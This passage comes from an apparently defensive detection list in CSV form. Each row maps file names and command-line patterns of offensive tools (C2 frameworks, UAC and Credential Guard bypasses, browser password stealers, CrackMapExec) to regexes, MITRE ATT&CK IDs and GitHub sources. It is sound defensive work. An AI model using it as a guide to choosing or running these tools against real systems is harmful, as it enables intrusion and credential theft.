TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\bypass-clm.exe*",".{0,1000}\\bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\bypass-clm.sln*",".{0,1000}\\bypass\-clm\.sln.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\bypass-clm\Program.cs*",".{0,1000}\\bypass\-clm\\Program\.cs.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*\BypassCredGuard.cpp*",".{0,1000}\\BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" 
"*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\BypassCredGuard.log*",".{0,1000}\\BypassCredGuard\.log.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\bypasscredguard.pdb*",".{0,1000}\\bypasscredguard\.pdb.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*\bypassuac-x64.dll*",".{0,1000}\\bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - 
TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\C$\wh0nqs.txt.*",".{0,1000}\\C\$\\wh0nqs\.txt\..{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\c2_server.py*",".{0,1000}\\c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*\C2concealer*",".{0,1000}\\C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*\C2Prank.ps1*",".{0,1000}\\C2Prank\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\C2ReverseProxy\*",".{0,1000}\\C2ReverseProxy\\.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2ReverseServer*",".{0,1000}\\C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.ashx*",".{0,1000}\\C2script\\.{0,1000}\.ashx.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.jsp*",".{0,1000}\\C2script\\.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\C2script\*.php*",".{0,1000}\\C2script\\.{0,1000}\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" 
"*\CachedGPPPassword.cs*",".{0,1000}\\CachedGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\CamHacker\*",".{0,1000}\\CamHacker\\.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\capcom_sys_exec.x64.dll*",".{0,1000}\\capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\catspin-main\*",".{0,1000}\\catspin\-main\\.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*\ccmpwn.py*",".{0,1000}\\ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\ccmpwn\*",".{0,1000}\\ccmpwn\\.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\certipy.pfx*",".{0,1000}\\certipy\.pfx.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*\Chakra.dll*",".{0,1000}\\Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\chaos.exe*",".{0,1000}\\chaos\.exe.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - 
T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\CHAOS-5.0.1.zip*",".{0,1000}\\CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\CHAOS-master.zip*",".{0,1000}\\CHAOS\-master\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*\charlotte.cpp*",".{0,1000}\\charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*\charlotte.py*",".{0,1000}\\charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*\Check-VM.ps1*",".{0,1000}\\Check\-VM\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\cheetah.py*",".{0,1000}\\cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\cheetah-master.zip*",".{0,1000}\\cheetah\-master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\chimera.py*",".{0,1000}\\chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\Chimera-main\*",".{0,1000}\\Chimera\-main\\.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel\client\*",".{0,1000}\\chisel\\client\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel\server\*",".{0,1000}\\chisel\\server\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 
- TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*\chisel-master*",".{0,1000}\\chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\Chrome_pass.db*",".{0,1000}\\Chrome_pass\.db.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\ChromeKatz.sln*",".{0,1000}\\ChromeKatz\.sln.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\chromepasswordlist.csv*",".{0,1000}\\chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\chromepasswords.py*",".{0,1000}\\chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" 
"*\chromium\getCredschromium.h*",".{0,1000}\\chromium\\getCredschromium\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\chromium_based_browsers.py*",".{0,1000}\\chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*\CIMplant.exe*",".{0,1000}\\CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*\cleantracks.ps1",".{0,1000}\\cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CleanTracks.ps1*",".{0,1000}\\CleanTracks\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\clipboard.ps1*",".{0,1000}\\clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Clipboard.ps1*",".{0,1000}\\Clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 
- T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ClipboardMITM.py*",".{0,1000}\\ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\CloakNDaggerC2*",".{0,1000}\\CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*\cloud_enum.py*",".{0,1000}\\cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*\cme.exe* -d * -u * -H *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cme.exe* -d * -u * -p *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cme.exe* --shares*",".{0,1000}\\cme\.exe.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\CMLoot.ps1*",".{0,1000}\\CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*\code_exec.ps1*",".{0,1000}\\code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
